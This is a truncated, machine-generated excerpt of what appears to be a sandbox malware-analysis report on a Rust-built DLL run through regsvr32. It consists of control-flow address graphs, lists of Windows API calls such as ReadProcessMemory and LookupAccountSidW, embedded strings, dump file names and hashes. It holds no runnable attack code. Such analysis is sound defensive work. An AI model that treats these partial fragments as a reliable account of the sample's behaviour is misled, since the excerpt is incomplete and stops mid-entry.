7ffb99013eec-7ffb99013ef9 call 7ffb98ffcf80 2818->2826 2827 7ffb99013edd-7ffb99013ee5 2818->2827 2821->2812 2829 7ffb99013f26-7ffb99013f44 call 7ffb98ffdd10 2821->2829 2831 7ffb9901405f-7ffb99014062 2823->2831 2824->2806 2837 7ffb990140e4-7ffb990140fb call 7ffb98ffc910 2824->2837 2847 7ffb99013efb-7ffb99013f0e call 7ffb990d8b30 2826->2847 2848 7ffb99013ed0-7ffb99013ed7 2826->2848 2827->2811 2827->2818 2828->2832 2852 7ffb99013f7b-7ffb99013f7e 2829->2852 2853 7ffb99013f46-7ffb99013f5d 2829->2853 2830->2800 2830->2806 2838 7ffb9901408f-7ffb990140a3 2831->2838 2839 7ffb99014064 2831->2839 2851 7ffb99014383-7ffb990143b7 call 7ffb990cc040 2832->2851 2833->2851 2858 7ffb990141c4-7ffb99014205 call 7ffb990162c0 call 7ffb98ffd2b0 2833->2858 2837->2806 2849 7ffb99014050-7ffb9901405d 2838->2849 2850 7ffb990140a5-7ffb990140b4 call 7ffb98ffc910 2838->2850 2845 7ffb99014070-7ffb9901408b 2839->2845 2845->2845 2857 7ffb9901408d 2845->2857 2847->2811 2848->2827 2849->2824 2849->2831 2850->2849 2867 7ffb990143b9 2851->2867 2868 7ffb990143ca-7ffb990143e2 call 7ffb990177f0 2851->2868 2855 7ffb99013f8f-7ffb99013f93 2852->2855 2856 7ffb99013f80-7ffb99013f8a call 7ffb98ffc910 2852->2856 2854 7ffb99013f60-7ffb99013f63 2853->2854 2854->2852 2862 7ffb99013f65-7ffb99013f79 2854->2862 2855->2812 2856->2855 2857->2838 2875 7ffb9901420a-7ffb99014219 2858->2875 2862->2852 2862->2854 2867->2868 2870 7ffb990143bb-7ffb990143c5 call 7ffb98ffc910 2867->2870 2876 7ffb990143e4-7ffb990143f2 call 7ffb98ffc910 2868->2876 2877 7ffb990143f7-7ffb9901442c 2868->2877 2870->2868 2878 7ffb9901421f-7ffb9901423e 2875->2878 2879 7ffb99014317-7ffb99014328 2875->2879 2876->2877 2877->2792 2882 7ffb99014240-7ffb990142ee call 7ffb990cd5a0 * 2 2878->2882 2879->2793 2880 7ffb9901432e 2879->2880 2880->2812 2886 7ffb990142f3-7ffb99014304 call 7ffb990162c0 2882->2886 2888 7ffb99014309-7ffb99014311 2886->2888 2888->2879 2888->2882
                                                                                APIs
                                                                                Strings
                                                                                • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 00007FFB99014357
                                                                                • key_used disappeared, xrefs: 00007FFB99013EFB
                                                                                • global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\system.rs, xrefs: 00007FFB99014333
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Query$CollectDataOpen
                                                                                • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\system.rs$key_used disappeared
                                                                                • API String ID: 1159074299-968433683
                                                                                • Opcode ID: 46960911b40cb9a927aa096cc1974b329453aa525ff52a8b9caf07261619081b
                                                                                • Instruction ID: 7c1b769c6b5d65fc2f6a6a8d69d37b168fb2b20d93423d726d80ffa49513abf9
                                                                                • Opcode Fuzzy Hash: 46960911b40cb9a927aa096cc1974b329453aa525ff52a8b9caf07261619081b
                                                                                • Instruction Fuzzy Hash: A6F18DA2A08B9281E7B09F35E4013AA77A0FB85B94F549235EEAD077E5DF3DE445C340

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2889 7ffb99095ae0-7ffb99095b17 call 7ffb990a3c40 2892 7ffb99095b23-7ffb99095b5d call 7ffb990a6230 2889->2892 2893 7ffb99095b19-7ffb99095b1e 2889->2893 2897 7ffb99095b67-7ffb99095b71 2892->2897 2898 7ffb99095b5f-7ffb99095b62 2892->2898 2895 7ffb99095cfb-7ffb99095d0a 2893->2895 2899 7ffb99095b73-7ffb99095b75 2897->2899 2900 7ffb99095b79-7ffb99095b7b 2897->2900 2898->2895 2901 7ffb99095b77 2899->2901 2902 7ffb99095b7d-7ffb99095b81 2899->2902 2900->2902 2903 7ffb99095bd8-7ffb99095bdc 2900->2903 2906 7ffb99095b8d-7ffb99095b96 2901->2906 2902->2906 2907 7ffb99095b83-7ffb99095b87 2902->2907 2904 7ffb99095ccd-7ffb99095cda 2903->2904 2905 7ffb99095be2-7ffb99095be6 2903->2905 2904->2895 2909 7ffb99095cdc-7ffb99095cf6 call 7ffb98ffc910 2904->2909 2905->2904 2908 7ffb99095bec-7ffb99095bf0 2905->2908 2910 7ffb99095b98-7ffb99095ba1 2906->2910 2911 7ffb99095bad-7ffb99095bb0 2906->2911 2907->2904 2907->2906 2908->2906 2912 7ffb99095bf2 2908->2912 2909->2895 2914 7ffb99095ba3-7ffb99095ba6 2910->2914 2915 7ffb99095bb2-7ffb99095bbb 2910->2915 2911->2915 2916 7ffb99095bf7-7ffb99095c07 2911->2916 2912->2904 2917 7ffb99095ba8-7ffb99095bab 2914->2917 2920 7ffb99095bbd-7ffb99095bc1 2914->2920 2915->2917 2915->2920 2916->2917 2918 7ffb99095c09 2916->2918 2923 7ffb99095c27-7ffb99095c5f CreateFileW 2917->2923 2918->2920 2921 7ffb99095bc3-7ffb99095bd6 2920->2921 2922 7ffb99095c0b-7ffb99095c0d 2920->2922 2921->2923 2924 7ffb99095c1a-7ffb99095c1c 2922->2924 2925 7ffb99095c0f-7ffb99095c16 2922->2925 2926 7ffb99095c65-7ffb99095c6c 2923->2926 2927 7ffb99095d0b-7ffb99095d23 GetLastError 2923->2927 2924->2904 2929 7ffb99095c22 2924->2929 2928 7ffb99095c18 2925->2928 2925->2929 2932 7ffb99095ca7-7ffb99095cac 2926->2932 2933 7ffb99095c6e-7ffb99095c72 2926->2933 2930 7ffb99095d25 2927->2930 2931 7ffb99095cae-7ffb99095cc5 call 7ffb98ffc910 2927->2931 2928->2923 2929->2923 2934 7ffb99095cc8-7ffb99095ccb 2930->2934 2931->2934 2932->2931 2932->2934 2933->2932 2936 7ffb99095c74-7ffb99095c7e GetLastError 2933->2936 2934->2895 2936->2932 2937 7ffb99095c80-7ffb99095ca1 SetFileInformationByHandle 2936->2937 2937->2932 2939 7ffb99095d27-7ffb99095d42 GetLastError call 7ffb990ef55c 2937->2939 2942 7ffb99095d44-7ffb99095d53 call 7ffb98ffc910 2939->2942 2943 7ffb99095d58-7ffb99095d60 2939->2943 2942->2943 2943->2895
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 22b187b5b003b3bb62fe2197e73667aab976a0dff98c5650e2d6d8fda656f44a
                                                                                • Instruction ID: 44d034c40090df5cfc3dfd41593186309027f7a8e894296001539be840394e37
                                                                                • Opcode Fuzzy Hash: 22b187b5b003b3bb62fe2197e73667aab976a0dff98c5650e2d6d8fda656f44a
                                                                                • Instruction Fuzzy Hash: 266192D1E086974AFBB58F32C5043B92AE16F45B98F144531DDBE47BCADE2DD8468700

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3656 7ffb99004ba0-7ffb99004baf 3657 7ffb99004bb1-7ffb99004bbe call 7ffb990ef9d4 3656->3657 3658 7ffb99004c0e-7ffb99004c18 3656->3658 3657->3658 3662 7ffb99004bc0-7ffb99004bcc call 7ffb990ef9c4 3657->3662 3659 7ffb99004c1b-7ffb99004c27 3658->3659 3665 7ffb99004c28-7ffb99004c3e call 7ffb990ef9bc 3662->3665 3666 7ffb99004bce-7ffb99004bd6 call 7ffb98ffc930 3662->3666 3673 7ffb99004ce4-7ffb99004d60 call 7ffb990d8e40 LookupAccountSidW 3665->3673 3674 7ffb99004c44-7ffb99004c5e call 7ffb99041330 3665->3674 3669 7ffb99004bdb-7ffb99004bde 3666->3669 3671 7ffb99004be4-7ffb99004bf6 CopySid 3669->3671 3672 7ffb99004c8f-7ffb99004c97 call 7ffb990cc040 3669->3672 3671->3674 3676 7ffb99004bf8-7ffb99004bfb 3671->3676 3681 7ffb99004c9c-7ffb99004cdf call 7ffb9901b360 3672->3681 3686 7ffb99004d62-7ffb99004d6e 3673->3686 3687 7ffb99004d8b-7ffb99004d9f call 7ffb99041330 3673->3687 3683 7ffb99004c6a-7ffb99004c7a 3674->3683 3684 7ffb99004c60-7ffb99004c65 call 7ffb99041320 3674->3684 3680 7ffb99004c01-7ffb99004c0c 3676->3680 3676->3681 3680->3659 3681->3673 3683->3659 3691 7ffb99004c7c-7ffb99004c8d call 7ffb98ffc910 3683->3691 3684->3683 3688 7ffb99004db6 3686->3688 3689 7ffb99004d70-7ffb99004d80 call 7ffb98ffc930 3686->3689 3699 7ffb99004e9a-7ffb99004eaa 3687->3699 3700 7ffb99004da5-7ffb99004da8 3687->3700 3696 7ffb99004dbb-7ffb99004df4 LookupAccountSidW 3688->3696 3703 7ffb99004eb8-7ffb99004efd call 7ffb990cc040 call 7ffb990ef9ac 3689->3703 3704 7ffb99004d86-7ffb99004d89 3689->3704 3691->3659 3701 7ffb99004df6-7ffb99004e0f call 7ffb9903f0c0 3696->3701 3702 7ffb99004e2f-7ffb99004e49 call 7ffb99041330 3696->3702 3707 7ffb99004e86-7ffb99004e99 3699->3707 3708 7ffb99004eac-7ffb99004eb6 call 7ffb99041320 3699->3708 3700->3686 3706 7ffb99004daa-7ffb99004db4 call 7ffb99041320 3700->3706 3716 7ffb99004e11-7ffb99004e2b 3701->3716 3717 7ffb99004e5f-7ffb99004e73 3701->3717 3719 7ffb99004e55-7ffb99004e5b 3702->3719 3720 7ffb99004e4b-7ffb99004e50 call 7ffb99041320 3702->3720 3729 7ffb99004f49-7ffb99004f5a call 7ffb99041330 3703->3729 3730 7ffb99004eff-7ffb99004f0c 3703->3730 3704->3696 3706->3686 3708->3707 3722 7ffb99004e75-7ffb99004e81 call 7ffb98ffc910 3716->3722 3723 7ffb99004e2d 3716->3723 3717->3707 3717->3722 3719->3722 3726 7ffb99004e5d 3719->3726 3720->3719 3722->3707 3723->3707 3726->3707 3739 7ffb99004f66-7ffb99004f68 3729->3739 3740 7ffb99004f5c-7ffb99004f61 call 7ffb99041320 3729->3740 3731 7ffb99004f0e-7ffb99004f47 call 7ffb9903f0c0 3730->3731 3732 7ffb99004f6d-7ffb99004f77 3730->3732 3734 7ffb99004f7a-7ffb99004fea LocalFree call 7ffb990dc840 3731->3734 3732->3734 3741 7ffb99005000-7ffb9900500e 3734->3741 3744 7ffb99004fec-7ffb99004ffe call 7ffb98ffc910 3734->3744 3739->3741 3740->3739 3744->3741
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AccountLookup$CopyFreeLocal
                                                                                • String ID:
                                                                                • API String ID: 3405025632-0
                                                                                • Opcode ID: 1eaab3c5d766325dbd0190a3a7f479658cb86e787e1f623badaa0aa559fbca9b
                                                                                • Instruction ID: 0909d2a9ba7b9763d5c11d9912395e263ff804049882a1eb3174e7882a983327
                                                                                • Opcode Fuzzy Hash: 1eaab3c5d766325dbd0190a3a7f479658cb86e787e1f623badaa0aa559fbca9b
                                                                                • Instruction Fuzzy Hash: E7C19DB2608B4381FAB09F21E4503BAB7A0FB89390F544135EE9D46B95EF7DE441CB04

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateErrorEventLast
                                                                                • String ID:
                                                                                • API String ID: 3743700123-0
                                                                                • Opcode ID: 73f5e18a21dc9f94ee0a9d8b981ef5d1567ae42563fc873a66b45c2830b1b57f
                                                                                • Instruction ID: 1c49524a8c92ed7e241565a2115773fffa2058996640a7a07ac67985c57d2864
                                                                                • Opcode Fuzzy Hash: 73f5e18a21dc9f94ee0a9d8b981ef5d1567ae42563fc873a66b45c2830b1b57f
                                                                                • Instruction Fuzzy Hash: 3511B463B0875242F6A99F72E5553782660AB89790F188034DFAD47BC2EF3DE4E28340

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$ErrorLastProcessTimes
                                                                                • String ID:
                                                                                • API String ID: 2166301098-0
                                                                                • Opcode ID: a0b7e2c5a21875be9e5374b7f7d2a0a31ea491975b18e65bec993bb82cf9f54b
                                                                                • Instruction ID: 2b30404456ead1d0581a132b001c18fb5df2de3f5bbfaeaea0239304be4956f6
                                                                                • Opcode Fuzzy Hash: a0b7e2c5a21875be9e5374b7f7d2a0a31ea491975b18e65bec993bb82cf9f54b
                                                                                • Instruction Fuzzy Hash: 3D81B1B2609BC691EAB19F25E4447AAB764FB99BC0F404226EEDC17B55DF3CC184C700

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3789 7ffb98ffcde0-7ffb98ffcdf4 3790 7ffb98ffce6a-7ffb98ffce76 3789->3790 3791 7ffb98ffcdf6-7ffb98ffce07 3789->3791 3792 7ffb98ffce78-7ffb98ffce7f CloseHandle 3790->3792 3793 7ffb98ffcea7-7ffb98ffceb3 3790->3793 3794 7ffb98ffce32-7ffb98ffce35 3791->3794 3792->3793 3795 7ffb98ffce81-7ffb98ffce9b call 7ffb99041330 3792->3795 3796 7ffb98ffceba-7ffb98ffcec5 3793->3796 3797 7ffb98ffceb5 PdhCloseQuery 3793->3797 3798 7ffb98ffce37 3794->3798 3799 7ffb98ffce10-7ffb98ffce13 3794->3799 3795->3793 3805 7ffb98ffce9d-7ffb98ffcea2 call 7ffb99041320 3795->3805 3797->3796 3802 7ffb98ffce40-7ffb98ffce59 3798->3802 3801 7ffb98ffce15-7ffb98ffce30 PdhRemoveCounter 3799->3801 3801->3790 3801->3794 3802->3802 3803 7ffb98ffce5b-7ffb98ffce68 3802->3803 3803->3801 3805->3793
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Close$CounterHandleQueryRemove
                                                                                • String ID:
                                                                                • API String ID: 2858124046-0
                                                                                • Opcode ID: ec4ffcc8567a3f188813cc51e746f1a03117ceca20d591a591bffe2e3af57f23
                                                                                • Instruction ID: 7bdc1dad3e05eab07bec9ad76b30a8cd2a66e4af59e7aacfef24cd93af4e03c1
                                                                                • Opcode Fuzzy Hash: ec4ffcc8567a3f188813cc51e746f1a03117ceca20d591a591bffe2e3af57f23
                                                                                • Instruction Fuzzy Hash: 842125B2A19A6345EB709F39D4013786751EF80BA4FA46730EB6E826D1EF38E4428704

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3807 7ffb99013300-7ffb9901332a 3808 7ffb99013330-7ffb99013342 3807->3808 3809 7ffb99013437-7ffb99013483 call 7ffb990cc040 3807->3809 3808->3809 3810 7ffb99013348-7ffb99013375 call 7ffb98ffc900 3808->3810 3817 7ffb9901349f-7ffb990134ab 3809->3817 3818 7ffb99013485-7ffb9901348c 3809->3818 3810->3809 3816 7ffb9901337b-7ffb990133a6 ReadProcessMemory 3810->3816 3819 7ffb990133c3-7ffb990133dd call 7ffb99041330 3816->3819 3820 7ffb990133a8-7ffb990133ad 3816->3820 3823 7ffb990134dc-7ffb990134e4 3817->3823 3824 7ffb990134ad-7ffb990134b3 3817->3824 3821 7ffb9901348e-7ffb9901349b 3818->3821 3822 7ffb990134c8-7ffb990134da 3818->3822 3839 7ffb990133df-7ffb990133e4 call 7ffb99041320 3819->3839 3840 7ffb990133e9-7ffb990133f5 3819->3840 3827 7ffb990133af-7ffb990133c1 3820->3827 3828 7ffb990133f7-7ffb990133fc 3820->3828 3821->3824 3829 7ffb9901349d 3821->3829 3822->3823 3822->3824 3825 7ffb99013612-7ffb99013626 3823->3825 3826 7ffb990134ea-7ffb990134f9 call 7ffb99013300 3823->3826 3824->3826 3831 7ffb990134b5-7ffb990134c1 3824->3831 3838 7ffb990134fe-7ffb99013506 3826->3838 3834 7ffb99013423-7ffb99013436 3827->3834 3832 7ffb99013403-7ffb9901341e call 7ffb98ffc910 3828->3832 3829->3823 3831->3826 3836 7ffb990134c3 3831->3836 3832->3834 3836->3825 3841 7ffb9901352f-7ffb9901353c 3838->3841 3842 7ffb99013508-7ffb9901350f 3838->3842 3839->3840 3840->3832 3846 7ffb9901353e-7ffb99013545 3841->3846 3847 7ffb99013566 3841->3847 3844 7ffb99013511-7ffb99013514 3842->3844 3845 7ffb99013526-7ffb9901352a 3842->3845 3844->3845 3848 7ffb99013516-7ffb99013521 call 7ffb98ffc910 3844->3848 3845->3825 3849 7ffb99013550-7ffb99013556 3846->3849 3850 7ffb99013569-7ffb99013594 call 7ffb99089180 call 7ffb990a5100 call 7ffb99013070 3847->3850 3848->3845 3849->3850 3853 7ffb99013558-7ffb9901355f 3849->3853 3860 7ffb990135df-7ffb990135e7 3850->3860 3861 7ffb99013596-7ffb990135b1 3850->3861 3853->3849 3855 7ffb99013561-7ffb99013564 3853->3855 3855->3850 3864 7ffb990135f9-7ffb990135fc 3860->3864 3865 7ffb990135e9-7ffb990135f4 call 7ffb98ffc910 3860->3865 3862 7ffb990135b3-7ffb990135b6 3861->3862 3863 7ffb990135c8-7ffb990135dd 3861->3863 3862->3863 3866 7ffb990135b8-7ffb990135c3 call 7ffb98ffc910 3862->3866 3863->3864 3864->3825 3868 7ffb990135fe-7ffb9901360d call 7ffb98ffc910 3864->3868 3865->3864 3866->3863 3868->3825
                                                                                APIs
                                                                                Strings
                                                                                • ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\process.rs, xrefs: 00007FFB990133FC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID: ReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\process.rs
                                                                                • API String ID: 1726664587-2592314639
                                                                                • Opcode ID: 154fd1863748eb6e3aa37478280398bf4836337ff6abd2f241f701ef5836134d
                                                                                • Instruction ID: 8e172d3b412e8be1d48ec26f1bdd09684367f680303533b21c37c14247012cbf
                                                                                • Opcode Fuzzy Hash: 154fd1863748eb6e3aa37478280398bf4836337ff6abd2f241f701ef5836134d
                                                                                • Instruction Fuzzy Hash: 4681D5A2A08A5281EAB18F22E4017BA67A0FF95BD4F54C131EEAD477C5DF3DE5818710

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3871 7ffb99014440-7ffb99014451 3872 7ffb99014453-7ffb99014477 call 7ffb990ef7bc 3871->3872 3873 7ffb990144c6-7ffb990144c8 3871->3873 3877 7ffb9901447c-7ffb9901447e 3872->3877 3875 7ffb9901455c-7ffb99014565 3873->3875 3876 7ffb990144ce-7ffb9901450c K32GetPerformanceInfo 3873->3876 3876->3875 3878 7ffb9901450e-7ffb99014555 3876->3878 3879 7ffb9901448b-7ffb990144b7 call 7ffb99041330 3877->3879 3880 7ffb99014480-7ffb99014489 3877->3880 3878->3875 3879->3873 3883 7ffb990144b9-7ffb990144c1 call 7ffb99041320 3879->3883 3880->3873 3883->3873
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: InfoPerformance
                                                                                • String ID: @
                                                                                • API String ID: 3070290716-2766056989
                                                                                • Opcode ID: 20f44ae7a57ef176a7fd478efd20977fc81dc49758b823866ee7d790288df0ab
                                                                                • Instruction ID: 21ddbaa297a94fde0153127af841d6e8db03397f6c198738176565a8332f1eb5
                                                                                • Opcode Fuzzy Hash: 20f44ae7a57ef176a7fd478efd20977fc81dc49758b823866ee7d790288df0ab
                                                                                • Instruction Fuzzy Hash: 04316361A18AC181E6B28B28E4467E5A3B4BFD9364F049320EBDC46795FF3DD1D68B40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
